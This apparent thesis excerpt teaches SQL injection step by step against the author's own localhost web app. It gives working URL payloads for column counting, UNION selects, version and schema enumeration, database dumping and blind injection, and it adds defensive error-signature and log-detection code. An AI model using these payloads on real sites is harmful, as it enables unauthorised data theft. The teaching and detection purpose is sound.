5.2 Types of SQL Injection:
Figure: Types of SQL Injection Attack (Ping-Chen,2011)
5.2.1 Simple SQL Injection Attacks (Ping-Chen, 2011):
• A "UNION SELECT" statement returns the union of the intended dataset with the target dataset.
• Eg: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard
System Stored Procedure
• Attackers exploit the database's stored procedures to perpetrate their attacks
End of Line Comment
• After injecting the crafted code into a specific field, the legitimate code that follows is nullified through the use of end-of-line comments
• Eg: select * from user where name = 'xyz' and userid IS NULL; --';
• Injecting statements that are always true, so that queries always return results upon evaluation of a WHERE condition
• Eg: SELECT * FROM users WHERE name = ' ' OR '1'='1';
Illegal/Logically Incorrect Query
• An attacker may gain knowledge of injectable parameters, data types, names of tables, etc. by injecting illegal/logically incorrect requests.
5.2.2 SQL Injection in MySQL using the URL method
Generally an attacker tests for the vulnerability by passing a quote as input; if the application returns an error message, the web application may be considered vulnerable to SQL injection (Sutton, Greene & Amini, 2007). Error messages vary depending on the type of database, so you may get different errors in different web applications. Before launching a SQL injection attack, the hacker first determines whether the configuration of the database and its related tables and variables is vulnerable. The steps to determine the SQL server's vulnerability are as follows (Naresh, Soujanya, Yugandhar & Rao, 2011):
1. Using your web browser, search for a website that uses a login page or other database input or query fields (such as an "I forgot my password" form). Look for web pages that display the POST or GET HTML commands by checking the site's source code.
2. Test the SQL server using single quotes (''). Doing so indicates whether the user input variable is sanitized or interpreted literally by the server. If the server responds with an error message that says use 'a'='a' (or something similar), then it is most likely susceptible to a SQL injection attack (Cross, 2007).
3. Use the SELECT command to retrieve data from the database or the INSERT command to add information to the database.
For this thesis I used my own application, which I developed during my academic project. The name of the application is BCS (Buy Cut Save) PREDICTION. It is an application which provides information to customers for placing meat orders. Based on those orders the butcher can see all the customers' orders and can put more meat items in the web application. Using MySQL injection through the URL method, I dumped all the customers' personal information such as email, contact and company name. I could even dump the whole database and get the butcher's information as well. All of the following tests were done on a localhost server with this application.
Adding Malicious Characters
In the link of a website you may find an "=" sign. To perform a SQL injection on the website you type commands after the "=" sign. Simply start typing the commands after the equals sign and click "Go" in your web browser, as if you were going to a new website. The simplest way to understand what you need to do is to see an example attack broken down into steps (Palmer, 2007).
Suppose we found a site whose URL contains an = sign, meaning it is a database-driven website; now we need to determine whether the link is vulnerable. Let's say that we have a site like this:
Now, to test whether the link is vulnerable, we add a quote (') to the end of the URL. For example:
If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ..." or something similar, the site is vulnerable to SQL injection.
Analyzing Errors
Every database has different syntax, so you will receive a different error message from each database. Below I have included some error messages from several databases (Mirdula & Manivannan, 2013).
MySQL error:
"You have an error in your SQL"
"Supplied argument is not a valid MySQL result resource in"
"Division by zero in"
"Call to a member function"
Access error:
"Microsoft JET Database"
"ODBC Microsoft Access Driver"
Oracle error:
"Microsoft OLE DB Provider for Oracle"
MSSQL error:
"Microsoft OLE DB Provider for SQL Server"
"Unclosed quotation mark"
"[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect"
"[Microsoft][ODBC SQL Server Driver]"
If you do not receive an error like the ones above, you have to move on to the next link to test for the vulnerability. This makes it a very time-consuming process: first we have to collect each and every link of the web application, and then we have to test each link with the payload. If you have received a penetration-testing contract for a large web application, it may not be possible to complete the process within the time limit (Mirdula & Manivannan, 2013).
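Added example, not code from the thesis: a checker that scans HTTP response bodies for the error fragments in the table above, so that verbose database errors can be caught during testing before they reach a user; the grouping of fragments by back-end follows the table, the sample responses are constructed, and the generic replacement message is an assumption of this example.

```python
import re

# Verbose error fragments from the thesis's error-message table, grouped by
# the back-end that typically produces them.
DB_ERROR_SIGNATURES = {
    "MySQL": [
        "You have an error in your SQL",
        "Supplied argument is not a valid MySQL result resource in",
        "Division by zero in",
        "Call to a member function",
    ],
    "Access": ["Microsoft JET Database", "ODBC Microsoft Access Driver"],
    "Oracle": ["Microsoft OLE DB Provider for Oracle"],
    "MSSQL": [
        "Microsoft OLE DB Provider for SQL Server",
        "Unclosed quotation mark",
        "[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect",
        "[Microsoft][ODBC SQL Server Driver]",
    ],
}

# Compile once; re.escape keeps the bracketed fragments literal.
_COMPILED = [(db, sig, re.compile(re.escape(sig), re.I))
             for db, sigs in DB_ERROR_SIGNATURES.items() for sig in sigs]


def classify_error(body):
    """Return the (database, fragment) pairs whose text appears in a response body."""
    return [(db, sig) for db, sig, rx in _COMPILED if rx.search(body)]


# Constructed sample responses as (url, status, body); the bodies are made up
# to resemble the errors the thesis describes.
SAMPLE_RESPONSES = [
    ("/bcs/admin/category_form.php?id=1", 200, "<h1>Category Title: BEEF</h1>"),
    ("/bcs/admin/category_form.php?id=1'", 200,
     "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL "
     "result resource in /var/www/bcs/admin/category_form.php on line 42"),
    ("/bcs/admin/category_form.php?id=1+order+by+4--", 200,
     "You have an error in your SQL syntax; check the manual that corresponds "
     "to your MySQL server version for the right syntax to use near "
     "'order by 4--' at line 1"),
    ("/legacy/login.asp", 500,
     "Microsoft OLE DB Provider for SQL Server error '80040e14' "
     "Unclosed quotation mark before the character string"),
]


def find_leaks(responses):
    """Map each URL whose body fingerprints a database to the back-ends matched."""
    leaks = {}
    for url, _status, body in responses:
        hits = classify_error(body)
        if hits:
            leaks[url] = sorted({db for db, _ in hits})
    return leaks


def sanitize_response(body):
    """What the application should send instead: a generic message, with the
    detailed error kept in the server log rather than shown to the client."""
    return "An internal error occurred." if classify_error(body) else body


if __name__ == "__main__":
    for url, dbs in find_leaks(SAMPLE_RESPONSES).items():
        print(f"{url} leaks {', '.join(dbs)} error text")
```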
Gathering Information
Once the attacker has found a vulnerable web link, he starts to enumerate various database-related information. Enumeration consists of operations such as null column analysis, database version enumeration, column enumeration and so on. In this topic we will understand how a database can be enumerated if a web application suffers from a SQLi bug (Antunes & Vieira, 2009).
Enumerating Column Length in a MySQL Database
As I know from the previous practical that I have a SQL-injectable URL, I now have a vulnerable site and go one step further: I enumerate the website to find the number of columns. For that I can use the ORDER BY statement (which tells the database how to order the result).
http://localhost/bcs/admin/category_form.php?id=1+order+by+1-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+2-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+3-- <-- no error
http://localhost/bcs/admin/category_form.php?id=1+order+by+4-- <-- error (I got a message like "Unknown column '4' in 'order clause'" or something like that)
In the example above I received an error at 4, which means the query has 3 columns, because I got an error on 4.
After finding the injection point I need to check the UNION function; with UNION I can select more data in one SQL statement (Messmer, 2008). So I can build the query as below:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3
The URL above may be called the exploitable URL.
Null Column Analysis Manually
First of all I add a comment at the end of the exploitable URL, such as /* or --.
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3/*
NOTE: if /* does not work or you get an error, then try --, for example:
http://localhost/bcs/admin/category_form.php?id=1 union all select 1,2,3--
It is a comment and it is important for our query to work properly. Once I execute the URL above in the browser I will be able to see a numeric value in the browser; let's say that we have the number 2 on the screen. That means number 2 is my null column for this web link. I can run my SQL commands through this column (McAllister, Kirda & Kruegel, 2008).
Fetching Database Version Manually
To check the version of the database I can simply use @@version or the version() function. As discussed previously, column number 2 is the null column, so I can simply put this function in place of the number 2 in our exploitable URL (Shar & Tan, 2013).
I can see that when I put my exploitable URL into this web page we get the version of the database. The picture shows 5.6.16 as the version of the database.
If you get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE) ...", then the convert(), hex() and unhex() functions can be used (Easttom, 2012).
http://localhost/bcs/admin/category_form.php?id=1+AND+1=2+UNION+ALL+SELECT+1,convert(@@version using latin1),3--
Then you will get the MySQL version of the database.
Fetching Database Name
To check the database name I can use the database() function; to test this I need to replace the number 2 with database() and get something similar to the image below (Alanazi & Sarrab, 2011).
You can see from the example that I replaced column number 2 with database(), and I got the name of the database, INFORMATION_SCHEMA.
Fetching User Information
To check which user is using this database I replace the number 2 with user() and get something like below (Oehlert, 2005):
You can see that by applying user() I got the username root@localhost that is using this database. This web application is running on a localhost server.
Database, Table and Column Enumeration
Once the database information enumeration has completed successfully, the next step is to get the list of database tables and column names. In this topic I will understand how I can enumerate the column and table names of the database if the web application is suffering from the SQL injection vulnerability (Alanazi & Sarrab, 2011).
Enumerating Table Names for MySQL version < 5:
Now that I have the version, we will enumerate the database table and column names. If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12, ...) we must guess table and column names in most cases. Common table names are: users, admin, member, ...; common column names are: username, user, usr, user_name, password, pass, passwd, pwd, etc.
Now suppose the SQL version I get is 5; then the method above will not work, but I can use the following method. For this we need the database name, which I already got by using database(). I can use the information_schema database to find its table names. To get tables we use table_name and information_schema.columns (Howard, LeBlanc & Viega, 2010).
Here we replace the number 2 with table_name to get the first table from information_schema.columns, displayed on the screen below.
You can see from the example that I got the name of the first table, CHARACTER_SET, which is in the database information_schema. We can add LIMIT to the end of the query to list all tables (Ringgold & Portland, 2012).
Enumerating Columns
Now I want to get the column names of a particular database. I will use column_name and information_schema.columns to get the column names.
Here I replace the number 2 with column_name to get the first column from information_schema.columns, displayed on the screen below. We can add LIMIT to the end of the query to list all columns.
You can see from the example that by using column_name I got the name of the column which is in the information_schema database.
Dumping Database
The database dumping process can start only once we have the column information. The next task of the penetration tester is to enumerate the information inside the columns of the table. The database holds all the information, such as passwords and users' information. The pen tester tries to dump the database information using this technique (Howard, LeBlanc & Viega, 2010).
Now, to read the column contents we use the table name and the column name in the URL. Once we execute the URL as defined below we receive the information that exists in the defined column.
So, like that, we can use the MySQL URL method to carry out a SQL injection attack, and as we saw in the example of the BCS PREDICTION web application, we can obtain all the database information using the SQL injection method.
You can see in the database above that I found the database name, table name, column names and all the information of the database by using the MySQL URL method of SQL injection.
5.2.3 SQL Injection in MySQL by the Blind Injection Method:
Blind injection is a little more complicated than URL injection but it can be
http://localhost/bcs/admin/category_form.php?id=1
This time, when we use the URL above the page loads normally; now let's check whether it is vulnerable to blind injection.
Vulnerability Checking in Blind SQL Injection
Put 1=1 after the URL. The page will load normally because this condition is always true.
Condition is true:
Now change 1=1 to 1=2; this is false, so see what happens.
If some text, picture or other content is missing from the returned page, then the site is vulnerable to blind SQL injection. We can see in the snapshot below that when the condition is false, "CATEGORY OF TYPE" becomes "Category Title" instead of "BEEF".
If we find that the site is vulnerable to blind SQL injection, we then get the MySQL version. To get the version in a blind attack we use substring. We use true and false conditions with the version function to check whether the version of the database is 5 or 4.
Getting the Version in a MySQL Database
In blind SQL injection the database version is obtained with the substring function and @@version.
This should return TRUE if the version of MySQL is 5. If the database has version 5, then this condition is true, so the page loads normally.
Replace 5 with 4. If the database has version 5, then this condition is false.
It will then change some pictures or icons on the web page. We can see from the snapshot below that the Category Title is changed.
Enumerating Table Names from the Current Database:
In blind injection we have to guess table names with the condition. If the condition is true, the page loads normally.
We will try different table names:
2) Users
(We got an error)
(The page loads normally, which means the condition is true. The database has one table whose name is "admin".)
Enumerating Column Names:
Now we do the same as for table names: we start guessing. As I said before, try the common names for columns.
If the page loads normally we know that the column name is Userid in the Admin table (if we get false, try other common names or just guess). In the snapshot below we can see we got an error, which means there is no userid column in the Admin table.
2) Admin_id, for example
This page loads normally, which means there is a column named admin_id in the admin table. In this way, using blind SQL injection techniques, we dump the database.
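As an added example (not part of the thesis), the request patterns of the URL method in 5.2.2 and the blind method in 5.2.3 turned into detection logic over constructed web-server access-log lines, so that an enumeration sequence like the one above can be spotted in the logs of the application under test; the log format, client addresses and indicator names are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache common log format) built around
# the thesis's own localhost URLs; client addresses and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0930] "GET /bcs/admin/category_form.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2015:10:00:02 +0930] "GET /bcs/admin/category_form.php?id=1' HTTP/1.1" 200 611
10.0.0.5 - - [01/Jan/2015:10:00:03 +0930] "GET /bcs/admin/category_form.php?id=1+order+by+3-- HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2015:10:00:04 +0930] "GET /bcs/admin/category_form.php?id=1+order+by+4-- HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2015:10:00:05 +0930] "GET /bcs/admin/category_form.php?id=1+union+all+select+1,2,3-- HTTP/1.1" 200 5170
10.0.0.5 - - [01/Jan/2015:10:00:06 +0930] "GET /bcs/admin/category_form.php?id=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2015:10:00:07 +0930] "GET /bcs/admin/category_form.php?id=7 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2015:10:00:08 +0930] "GET /bcs/search.php?q=O'Brien HTTP/1.1" 200 2300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Each indicator mirrors one step of the URL or blind method in the thesis:
# the quote probe, the comment terminator, ORDER BY column counting, the
# UNION null-column step, version/database/user fingerprinting,
# information_schema enumeration and the blind true/false conditions.
INDICATORS = [
    ("stray_quote", re.compile(r"['\"]")),
    ("comment_terminator", re.compile(r"--|/\*|#")),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_probe", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("db_fingerprint", re.compile(r"@@version|\b(version|database|user)\s*\(\s*\)", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("blind_condition", re.compile(r"\b(and|or)\s+(\d+\s*=\s*\d+|substring\s*\()", re.I)),
]
# A lone quote is common in legitimate input (O'Brien), so on its own it is
# not enough to flag a request.
LOW_CONFIDENCE = {"stray_quote"}


def classify_target(target):
    """Decode the query string and return the sorted indicator names found in
    any parameter value (parse_qsl undoes the '+' and %XX encoding)."""
    values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    found = {name for name, rx in INDICATORS for v in values if rx.search(v)}
    return sorted(found)


def is_suspicious(tags):
    return any(t not in LOW_CONFIDENCE for t in tags)


def enumeration_sessions(log_text):
    """Group flagged requests by client address: a client that moves from
    column-count probes to UNION and fingerprinting is running the
    enumeration sequence described in the thesis."""
    per_client = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_target(m.group("target"))
        if is_suspicious(tags):
            per_client[m.group("ip")].update(tags)
    return {ip: sorted(tags) for ip, tags in per_client.items()}


if __name__ == "__main__":
    for ip, tags in enumeration_sessions(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```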
6. History of the web application security field and practice
When web applications were introduced in 1990, the web was a general, exiled delivery mechanism. It has transformed from a medium for static hypertext documents into a complete dynamic run-time environment for multi-party and distributed applications. Web technologies have progressively moved from a centralised server technology to interaction models and a dynamic client model. The emerging trend was popular in peer-to-peer web applications and multiple applications. But the transformation of the web application away from the server-centric model creates significant and numerous challenges in web application security (Alanazi & Sarrab, 2011). In the past decade it was not possible to make web applications client-centric. This works as motivation for the need for compact security in web applications.
Figure- History of Web Application Development till Hacking Arrives (Owasp.org.au, 2015)
After the introduction of the web server and browser, continuous development started. As it is a story of transformation, its security concerns started along with its progress. The year 1995 was a year of new achievements in the area of web development, in which many new things were discovered. In late 1994 the W3C was introduced. PHP 1.0 and Apache were introduced in 1995 (Alanazi & Sarrab, 2011). Microsoft released its software for web development, named IIS, and Internet Explorer 1 was also introduced. JavaScript and MySQL were created. Later on, these things were upgraded over time with new discoveries. There are some methodologies which worked for the security of web applications at the initial level of development:
Fine-grained access control: These are the policies which define how the application's authentication process works and how the application authorises end users. In the beginning of web applications, security was simple: the web application frameworks checked it, and simple sequences maintained the application's integrity. There was a series of questions about the foundation of the authentication process, and protocols limited the feasibility of authentication features such as secure session management (Alanazi & Sarrab, 2011).
Information-flow control: It specifies the security of sensitive data, trust domains, data integration, and client-side and server-side information processing. Initially in web development, the organisation's policies were the base for the security policy of a web application. Information-flow policies involved individuals with possibly certain goals. At that time, tracking end-to-end information and its flow in web applications could not be worked out and was followed by end-user review. Information-flow control policies are a set of mechanisms practically implemented in a web setting.
Figure timeline labels: First Web Server and Browser Introduced; W3C; PHP 1.0 and Apache Released; IIS 1.0 Released on Windows NT; Live (Java) Script, MySQL and IE1 Released; OWASP Started; ASP.NET 1.0 Released; SQL Slammer Worm Started; Work Started on HTML5; Samy Worm Released; AJAX Term Proposed; Web Vulnerability Scanner Introduced; Web Application Hacking Arrives
Secure composition: In the beginning, security was applied in the code of web applications. In short, the coding part was solely responsible for the security of a web application. Traditional HTML fails to deliver both the interaction and the security needs. Security is a composition of interaction and separation.
JavaScript has played an important role in securing the web application since its birth in web application development. This scripting language is formalising its semantics. Now HTML5 and CSP also come with many security features for various threats to web applications (Desmet and Johns, n.d.).
7. Web security with software engineering and design
Most applications are developed with software engineering models that help in the management of resources. Organisations are not fully aware of security issues, which were not considered a serious element in the development life cycle.
Organisations manage application security through separate processes to meet requirements. Meanwhile the SDLC provides options for securing an application. The security service can be implemented within the phases of the development life cycle (Meier, 2006).